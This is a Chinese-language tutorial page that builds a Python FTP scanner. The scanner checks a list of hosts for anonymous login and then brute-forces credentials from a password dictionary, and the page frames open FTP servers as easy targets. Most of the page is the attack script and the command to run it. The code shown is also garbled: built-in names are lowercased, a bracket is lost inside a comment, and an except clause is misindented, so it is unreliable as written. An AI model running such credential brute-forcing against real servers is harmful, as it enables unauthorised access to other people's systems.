开心学习
当前位置:脚本大全 > > 正文

Python实现FTP弱口令扫描器的方法示例(Python实现FTP弱口令扫描器的方法示例)

时间:2022-03-31 20:38:56类别:脚本大全

Python实现FTP弱口令扫描器的方法示例

Python实现FTP弱口令扫描器的方法示例

ftp服务器

ftp服务器是在互联网上提供文件存储和访问服务的计算机,它们依照ftp协议提供服务。ftp是file transfer protocol(文件传输协议)的缩写。顾名思义,就是专门用来传输文件的协议,简单地说,支持ftp协议的服务器就是ftp服务器

ftp是仅基于tcp的服务,不支持udp(想想也是,传输文件,肯定要稳定可靠,建立连接,所以不支持udp)。与众不同的是ftp使用2个端口,一个数据端口,一个命令端口(也叫控制端口)。通常来说这两个端口分别是21(命名端口)和20(数据端口)。但由于ftp工作方式的不同,数据端口并不总是20.这就是主动与被动ftp的最大不同之处。

ftp服务器的控制端口是21,数据端口是20,所以在做静态映射的时候只需开放21端口即可,他会用20端口和客户端主动发起连接

服务器的控制端口是21,数据端口是随机的,且是客户端去连接对应的数据端口,所以在做静态映射的话只开放21端口不可以的

ftp扫描的实现方案

扫描匿名ftp

ftp匿名登陆的扫描主要应用与批量扫描中,单独针对一个ftp服务器进行扫描的话成功率比较小。很多网站都开放ftp服务方便用户下载资源(这个允许匿名登陆不足为奇),更疯狂的是网站管理人员为了方便网站访问软件的更新也开放了ftp匿名登陆,这样就给了我们很多机会,尤其后者的服务器很容易受到攻击

扫描ftp弱口令

弱口令扫描其实就是暴力破解,不过我们只是扫描一些简单的密码组合,并不是所有可能的密码组合

步骤

ftp匿名扫描器的实现

这里需要用到python的 ftplib 库中的ftp这个类,这个类实现了ftp客户端的大多数功能,比如连接ftp服务器、查看服务器中的文件、上传、下载文件等功能,详细用法可以查看api,接下来我们首先定义 anonscan(hostname) 这个函数以实现扫描可匿名登陆的ftp服务器。代码如下:

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
    		•
  • def anonscan(hostname):      # 参数是主机名
  •   try:
  •     with ftp(hostname) as ftp: # 创建ftp对象
  •       ftp.login()      # ftp匿名登陆
  •       print("\n[*]" + str(hostname) + " ftp anonymous login successful!")
  •       return true
  •     except exception as e:   # 抛出异常表示匿名登陆失败
  •       print("\n[-]" + str(hostname) + " ftp anonymous login failure!")
  •       return false
    		•

    代码很简短,注释也写的很清楚。这里还是说一下函数的思路,首先用主机名构造了一个ftp对象(即ftp),然后用ftp调用不带参数的login()函数即表示要匿名登陆这个ftp服务器,如果登陆过程中没有产生异常,则表明匿名登陆成功,否则匿名登陆失败

    ftp弱口令的扫描

    ftp弱口令扫描依赖于用户名和密码字典,密码字典 下载 ,下载之后我们将其命名为 pwd.txt

    接下来针对字典中的格式来实现ftp弱口令扫描,创建代码文件 ftpscanner.py ,代码如下:

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
    		•
  • def vlclogin(hostname, pwdfile):        # parameters (hostname, dictionary file)
  •   try:
  •     with open(pwdfile, 'r') as pf:     # open dictionary file
  •       for line in pf.readlines():
  •         username = line.split(':')[0# fetch username
  •         password = line.split(':')[1].strip('\r').strip('\n') # fetch password
  •         print('[+] trying: ' + username + ':' + password)
  •         try:
  •           with ftp(hostname) as ftp:
  •             ftp.login(username, password)
  •             print('\n[+] ' + str(hostname) + ' ftp login successful: '+ \
  •                username + ':' + password)
  •             return (username, password)
  •         except exception as e:
  •           # continue trying other usernames and passwords
  •           pass
  •   except ioerror as e:
  •     print('error: the password file does not exist!')
  •   print('\n[-] cannot crack the ftp password, please change the password dictionary try again!')
  •   return (none,none)
    		•

    这段代码其实就是循环从字典中读取用户名和密码并尝试登陆,登陆成功则表明找到用户名和密码。由于这个函数将主机名定义成了可以用 , 分割的字符串。找到密码并不会终止程序,而是会继续扫描其他主机的弱口令,直到所有的主机都扫描一遍

    命令行解析

    至此,ftp扫描器几乎已经完成了,现在我们要做的是让我们的脚本可以处理命令行输入,以控制扫描哪些主机。命令行参数我们将用到python中的 argparse 库。

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
    		•
  • parser = argparse.argumentparser(description='ftp scanner')
  •   parser.add_argument('-h',dest='hostname',help='the host list with ","space')
  •   parser.add_argument('-f',dest='pwdfile',help='password dictionary file')
  •   options = none
  •   try:
  •     options = parser.parse_args()
  •  
  •   except:
  •     print(parser.parse_args(['-h']))
  •     exit(0)
  •  
  •   hostnames = str(options.hostname).split(',')
  •   pwdfile = options.pwdfile
    		•

    整合全部代码

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
    		•
  • # -*- coding: utf-8 -*-
  • from ftplib import *
  • import argparse
  • import time
  •  
  • # anonymous login scan
  • def anonscan(hostname):      # the parameter is the host name
  •   try:
  •     with ftp(hostname) as ftp: # create ftp object
  •       ftp.login()      # ftp anonymous login
  •       print("\n[*]" + str(hostname) + " ftp anonymous login successful!")
  •       return true
  •   except exception as e:   # throwing an exception indicates that the anonymous login failed
  •     print("\n[-]" + str(hostname) + " ftp anonymous login failure!")
  •     return false
  •  
  • # brute force
  • def vlclogin(hostname, pwdfile):        # parameters (hostname, dictionary file)
  •   try:
  •     with open(pwdfile, 'r') as pf:     # open dictionary file
  •       for line in pf.readlines():
  •         username = line.split(':')[0# fetch username
  •         password = line.split(':')[1].strip('\r').strip('\n') # fetch password
  •         print('[+] trying: ' + username + ':' + password)
  •         try:
  •           with ftp(hostname) as ftp:
  •             ftp.login(username, password)
  •             print('\n[+] ' + str(hostname) + ' ftp login successful: '+ \
  •                username + ':' + password)
  •             return (username, password)
  •         except exception as e:
  •           # continue trying other usernames and passwords
  •           pass
  •   except ioerror as e:
  •     print('error: the password file does not exist!')
  •   print('\n[-] cannot crack the ftp password, please change the password dictionary try again!')
  •   return (none,none)
  •  
  • def main():
  •   parser = argparse.argumentparser(description='ftp scanner')
  •   parser.add_argument('-h',dest='hostname',help='the host list with ","space')
  •   parser.add_argument('-f',dest='pwdfile',help='password dictionary file')
  •   options = none
  •   try:
  •     options = parser.parse_args()
  •  
  •   except:
  •     print(parser.parse_args(['-h']))
  •     exit(0)
  •  
  •   hostnames = str(options.hostname).split(',')
  •   pwdfile = options.pwdfile
  •   if hostnames == ['none']:
  •     print(parser.parse_args(['-h']))
  •     exit(0)
  •  
  •   for hostname in hostnames:
  •     username = none
  •     password = none
  •     if anonscan(hostname) == true:
  •       print('host: ' + hostname + ' can anonymously!')
  •     elif pwdfile != none:
  •       (username,password) = vlclogin(hostname,pwdfile)
  •       if password != none:
  •         print('\n[+] host: ' + hostname + 'username: ' + username + \
  •            'password: ' + password)
  •   print('\n[*]-------------------scan end!--------------------[*]')
  •  
  •  
  • if __name__ == '__main__':
  •   main()
    		•

    测试扫描

    至此就可以测试我们的ftp弱口令扫描器了,在命令行中输入

  • ?
  • 1
    		•
  • python ftpscanner.py -h 127.0.0.1 -f pwd.txt
    		•

    Python实现FTP弱口令扫描器的方法示例(Python实现FTP弱口令扫描器的方法示例)

    因为我本地并没有开启ftp服务,所以扫描不成功,大家可以尝试在服务器上开放ftp服务,然后进行测试,绝对不能用于非法用途

    以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持开心学习网。

    原文链接:https://www.wmathor.com/index.php/archives/1188/

    标签:
    Python FTP 扫描器 弱口令
    上一篇下一篇

    猜您喜欢

    热门推荐

    © 2021 开心学习